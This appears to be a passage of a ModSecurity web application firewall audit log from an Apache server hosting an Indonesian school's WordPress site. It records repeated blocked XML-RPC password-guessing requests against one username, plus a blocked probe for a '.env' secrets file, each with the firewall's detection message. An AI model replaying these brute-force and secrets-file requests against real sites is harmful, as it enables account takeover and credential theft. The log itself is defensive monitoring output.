p2=2009, p3=0, p4=0, p5=87, sr=58, sw=47, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72189a2f-Z-- --f8bfa313-A-- [19/Apr/2025:22:21:24 +0700] aAO_dHNa4dA2HllpK_PTBAAAAI0 103.236.140.4 36870 103.236.140.4 8181 --f8bfa313-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f8bfa313-C-- wp.getUsersBlogs kasubagtu 2222 --f8bfa313-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8bfa313-E-- --f8bfa313-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076084145768 5280 (- - -) Stopwatch2: 1745076084145768 5280; combined=3807, p1=468, p2=3067, p3=0, p4=0, p5=157, sr=89, sw=115, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8bfa313-Z-- --aecd7e5d-A-- [19/Apr/2025:22:22:24 +0700] aAO_sA6cTFSgLAHl7Po4AgAAABU 103.236.140.4 40286 103.236.140.4 8181 --aecd7e5d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --aecd7e5d-C-- wp.getUsersBlogs kasubagtu Webadmin --aecd7e5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aecd7e5d-E-- --aecd7e5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076144965681 3822 (- - -) Stopwatch2: 1745076144965681 3822; combined=2794, p1=395, p2=2239, p3=0, p4=0, p5=94, sr=79, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aecd7e5d-Z-- --4c40cd4e-A-- [19/Apr/2025:22:23:30 +0700] aAO_8kruoUXZj665VUFc8QAAAMI 103.236.140.4 43966 103.236.140.4 8181 --4c40cd4e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 234 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4c40cd4e-C-- wp.getUsersBlogs kasubagtu Administrator!@#$%^ --4c40cd4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c40cd4e-E-- --4c40cd4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076210338161 5175 (- - -) Stopwatch2: 1745076210338161 5175; combined=3751, p1=477, p2=3103, p3=0, p4=0, p5=100, sr=90, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c40cd4e-Z-- --15291437-A-- [19/Apr/2025:22:24:31 +0700] aAPALw6cTFSgLAHl7Po5sgAAAAQ 103.236.140.4 47392 103.236.140.4 8181 --15291437-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --15291437-C-- wp.getUsersBlogs kasubagtu temptemp --15291437-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15291437-E-- --15291437-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076271090602 5530 (- - -) Stopwatch2: 1745076271090602 5530; combined=4025, p1=452, p2=3373, p3=0, p4=0, p5=114, sr=94, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15291437-Z-- --529b4421-A-- [19/Apr/2025:22:25:07 +0700] aAPAU3Na4dA2HllpK_PWPQAAAJA 103.236.140.4 49506 103.236.140.4 8181 --529b4421-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.59.160.222 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.59.160.222 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50 Accept: */* --529b4421-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --529b4421-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745076307807232 666 (- - -) Stopwatch2: 1745076307807232 666; combined=322, p1=289, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --529b4421-Z-- --70df4b0f-A-- [19/Apr/2025:22:25:31 +0700] aAPAaw6cTFSgLAHl7Po6zQAAAAE 103.236.140.4 50820 103.236.140.4 8181 --70df4b0f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --70df4b0f-C-- wp.getUsersBlogs kasubagtu adminadmin --70df4b0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70df4b0f-E-- --70df4b0f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076331194088 5680 (- - -) Stopwatch2: 1745076331194088 5680; combined=4329, p1=532, p2=3591, p3=0, p4=0, p5=123, sr=90, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70df4b0f-Z-- --a309981c-A-- [19/Apr/2025:22:26:35 +0700] aAPAq-vDiFC_ir7MDwZCaAAAAEw 103.236.140.4 54300 103.236.140.4 8181 --a309981c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a309981c-C-- wp.getUsersBlogs kasubagtu qweqwe --a309981c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a309981c-E-- --a309981c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076395675125 4991 (- - -) Stopwatch2: 1745076395675125 4991; combined=3556, p1=471, p2=2902, p3=0, p4=0, p5=106, sr=80, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a309981c-Z-- --8ce12538-A-- [19/Apr/2025:22:27:37 +0700] aAPA6evDiFC_ir7MDwZDYQAAAEU 103.236.140.4 57646 103.236.140.4 8181 --8ce12538-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8ce12538-C-- wp.getUsersBlogs kasubagtu domain --8ce12538-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ce12538-E-- --8ce12538-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076457298250 4394 (- - -) Stopwatch2: 1745076457298250 4394; combined=3047, p1=378, p2=2483, p3=0, p4=0, p5=108, sr=69, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ce12538-Z-- --043cf85d-A-- [19/Apr/2025:22:28:37 +0700] aAPBJevDiFC_ir7MDwZD8gAAAE4 103.236.140.4 60938 103.236.140.4 8181 --043cf85d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --043cf85d-C-- wp.getUsersBlogs kasubagtu qq123456 --043cf85d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --043cf85d-E-- --043cf85d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076517223529 4804 (- - -) Stopwatch2: 1745076517223529 4804; combined=3759, p1=427, p2=3146, p3=0, p4=0, p5=109, sr=87, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --043cf85d-Z-- --d548413f-A-- [19/Apr/2025:22:29:38 +0700] aAPBYuvDiFC_ir7MDwZE_wAAAFQ 103.236.140.4 35968 103.236.140.4 8181 --d548413f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d548413f-C-- wp.getUsersBlogs kasubagtu 123456qwe --d548413f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d548413f-E-- --d548413f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076578781209 3293 (- - -) Stopwatch2: 1745076578781209 3293; combined=2485, p1=372, p2=1990, p3=0, p4=0, p5=71, sr=62, sw=52, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d548413f-Z-- --390b7652-A-- [19/Apr/2025:22:30:39 +0700] aAPBn3Na4dA2HllpK_PaywAAAJA 103.236.140.4 39270 103.236.140.4 8181 --390b7652-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --390b7652-C-- wp.getUsersBlogs kasubagtu 111qqq!!! --390b7652-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --390b7652-E-- --390b7652-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076639427344 4961 (- - -) Stopwatch2: 1745076639427344 4961; combined=3449, p1=417, p2=2870, p3=0, p4=0, p5=96, sr=86, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --390b7652-Z-- --44ec6f3f-A-- [19/Apr/2025:22:31:07 +0700] aAPBu-vDiFC_ir7MDwZF9gAAAFE 103.236.140.4 40824 103.236.140.4 8181 --44ec6f3f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --44ec6f3f-C-- wp.getUsersBlogs kasubagtu 1234%^&* --44ec6f3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44ec6f3f-E-- --44ec6f3f-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076667725514 5197 (- - -) Stopwatch2: 1745076667725514 5197; combined=3695, p1=443, p2=3069, p3=0, p4=0, p5=112, sr=84, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44ec6f3f-Z-- --a6973743-A-- [19/Apr/2025:22:31:45 +0700] aAPB4evDiFC_ir7MDwZGowAAAEc 103.236.140.4 42930 103.236.140.4 8181 --a6973743-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a6973743-C-- wp.getUsersBlogs kasubagtu chelsea --a6973743-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6973743-E-- --a6973743-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076705729784 5029 (- - -) Stopwatch2: 1745076705729784 5029; combined=3754, p1=508, p2=3090, p3=0, p4=0, p5=92, sr=92, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6973743-Z-- --2659a348-A-- [19/Apr/2025:22:32:45 +0700] aAPCHUruoUXZj665VUFkbAAAANA 103.236.140.4 46094 103.236.140.4 8181 --2659a348-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2659a348-C-- wp.getUsersBlogs kasubagtu chicken --2659a348-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2659a348-E-- --2659a348-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076765692101 4715 (- - -) Stopwatch2: 1745076765692101 4715; combined=3233, p1=442, p2=2594, p3=0, p4=0, p5=111, sr=89, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2659a348-Z-- --e53cde50-A-- [19/Apr/2025:22:33:46 +0700] aAPCWkruoUXZj665VUFlNQAAAM4 103.236.140.4 49372 103.236.140.4 8181 --e53cde50-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e53cde50-C-- wp.getUsersBlogs kasubagtu superman --e53cde50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e53cde50-E-- --e53cde50-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076826467509 4685 (- - -) Stopwatch2: 1745076826467509 4685; combined=3352, p1=355, p2=2808, p3=0, p4=0, p5=107, sr=53, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e53cde50-Z-- --feef5655-A-- [19/Apr/2025:22:34:50 +0700] aAPCmkruoUXZj665VUFmggAAAM8 103.236.140.4 52744 103.236.140.4 8181 --feef5655-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --feef5655-C-- wp.getUsersBlogs kasubagtu hellokitty --feef5655-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --feef5655-E-- --feef5655-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: 